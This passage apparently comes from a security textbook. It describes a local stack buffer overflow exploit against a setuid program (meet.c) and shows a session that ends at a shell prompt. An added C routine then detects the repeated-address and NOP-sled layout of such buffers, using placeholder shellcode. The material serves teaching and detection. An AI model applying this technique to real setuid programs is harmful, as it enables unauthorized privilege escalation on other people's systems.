Next a function is defined that will return the current value of the esp register on the local system. The main function takes up to three arguments, which optionally set the size of the overflowing buffer, the offset between the buffer and esp, and a manually supplied esp value for remote exploits. User directions are printed to the screen, followed by the memory locations used. Next the malicious buffer is built from scratch: it is filled with addresses, then NOPs, then shellcode, and terminated with a NULL character. The buffer is then injected into the vulnerable local program and printed to the screen (useful for remote exploits).
Gray Hat Hacking: The Ethical Hacker's Handbook
160
Let's try our new exploit on meet.c:
# gcc -o meet meet.c
# chmod u+s meet
# su joe
$ ./exploit 600
Usage: ./exploit
ESP:0xbffffbd8 Offset:0x0 Return:0xbffffbd8
Hello ?«^1??FF
...truncated for brevity...
sh-2.
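The address/NOP/shellcode layout described above is also what a defender can look for in incoming data. The following C is an added example, not code from the book or from exploit.c: it flags a buffer that begins with one repeated 4-byte word (the return-address block) followed by a NOP sled. The sample buffer, the thresholds (4 repeats, 16 NOPs) and the `[shellcode-placeholder]` marker are constructed here for illustration; the only value taken from the page is the ESP address 0xbffffbd8.

```c
#include <stddef.h>
#include <string.h>

#define NOP 0x90                 /* x86 one-byte NOP used for sleds */

/* Longest run of consecutive NOP bytes, i.e. the sled laid between the
   return addresses and the shellcode. */
size_t longest_nop_run(const unsigned char *buf, size_t len) {
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == NOP) ? run + 1 : 0;
        if (run > best) best = run;
    }
    return best;
}

/* Back-to-back repeats of the first 4-byte word at the front of the buffer
   (the exploit fills that region with copies of one return address). */
size_t leading_word_repeats(const unsigned char *buf, size_t len) {
    if (len < 4) return 0;
    size_t n = 1;
    while ((n + 1) * 4 <= len && memcmp(buf, buf + n * 4, 4) == 0) n++;
    return n;
}

/* Heuristic verdict: a repeated-address block plus a NOP sled of at least
   min_nops bytes is the signature of the buffer described in the text. */
int looks_like_overflow_buffer(const unsigned char *buf, size_t len,
                               size_t min_repeats, size_t min_nops) {
    return leading_word_repeats(buf, len) >= min_repeats &&
           longest_nop_run(buf, len) >= min_nops;
}

/* Constructed sample input (not a real exploit buffer): 8 copies of the ESP
   value 0xbffffbd8 from the session above in little-endian order, 40 NOPs, a
   text marker standing in for shellcode, then the terminating NULL. */
static unsigned char sample_buf[128];

size_t build_sample(void) {
    static const unsigned char addr[4] = {0xd8, 0xfb, 0xff, 0xbf};
    static const char marker[] = "[shellcode-placeholder]"; /* 23 chars + NUL */
    size_t pos = 0;
    for (int i = 0; i < 8; i++, pos += 4) memcpy(sample_buf + pos, addr, 4);
    memset(sample_buf + pos, NOP, 40); pos += 40;
    memcpy(sample_buf + pos, marker, sizeof marker); pos += sizeof marker;
    return pos;                   /* 32 + 40 + 24 = 96 bytes */
}
```

A benign string such as "Hello, world" has no repeated leading word and no NOP run, so the heuristic returns 0 for it while returning 1 for the constructed sample.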